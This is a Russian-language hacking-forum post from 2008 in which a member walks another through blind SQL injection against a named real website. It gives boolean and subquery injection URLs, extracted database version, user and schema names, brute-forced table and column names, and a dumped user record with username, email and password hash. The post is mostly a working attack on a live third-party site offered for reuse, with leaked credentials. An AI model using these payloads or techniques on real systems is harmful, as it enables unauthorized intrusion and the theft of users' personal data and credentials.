Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

  #10  
Старый 02.08.2008, 16:39
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
Цитата:
Сообщение от satana8920  
я так понял мне надо подзапросы использовать?если да то как это осуществить?
Прочитать про посимвольный перебор, а так же про подзапросы (да и про многое другое) можно здесь: https://forum.antichat.ru/threadnav43966-1-10.html

Код:
http://www.irintech.com/x1/blogarchive.php?id=764+and+1=1 - запрос выполняется правильно, результат запроса не меняется
http://www.irintech.com/x1/blogarchive.php?id=764+and+1=2 - запрос выполняется не правильно, результат запроса меняется
Таким образом посимвольно выводи нужную тебе информацию (для начала нужно вывести версию, т.к. подзапросы доступны начиная с версии 4.1), только делать это руками не рационально, лучше скриптом или программой:

Код:
version(): 4.1.11-Debian_4sarge7
user(): db35109_rooted@10.1.3.24
database(): db35109_x1
Т.к. версия БД => 4.1 то использовать подзапросы можно:

Код:
http://www.irintech.com/x1/blogarchive.php?id=764+and+(select+1)=1 - это уже пример подзапроса
Дальше тебе нужно брутить таблицы, могу попробывать если хочешь (т.к. я сейчас занимаюсь тестированием своего скрипта, который как раз работает со слепыми инъекциями), если найдутся какие либо (займет поиск часа 2-3), то добавлю инфу в этот же пост.

А вот и найденые таблицы:

Код:
Имена таблиц взяты из файла: lib_and_data/grey_table_name.txt
Всего: 1559 имён таблиц
Найдено таблиц: 2
admin
user
Колонки к таблице admin:

Код:
Подбор имён колонок к таблице: admin
Найдено колонок: 1
id
Колонки к таблице user:

Код:
Подбор имён колонок к таблице: user
Найдено колонок: 4
id
username
email
password
Жаль что колонки к таблице с админами не сбрутились, надо будет мне состряпать словарь с именами колонок, а то того что юзаю я пока не хватает.

Вывел данные из таблиц, может пригодится:

Код:
Вывод результата запроса: (select id from admin limit 0,1)
length((select id from admin limit 0,1)): 1
(select id from admin limit 0,1): 1
Код:
Вывод результата запроса: (select concat(id,char(58),email,char(58),username,char(58),password) from user limit 0,1)
length((select concat(id,char(58),email,char(58),username,char(58),password) from user limit 0,1)): 45
(select concat(id,char(58),email,char(58),username,char(58),password) from user limit 0,1): 35:jean:jean:3308150413ecf9da841f9a9dd90309ba
Последний раз редактировалось Grey; 03.08.2008 в 16:19..
 
Ответить с цитированием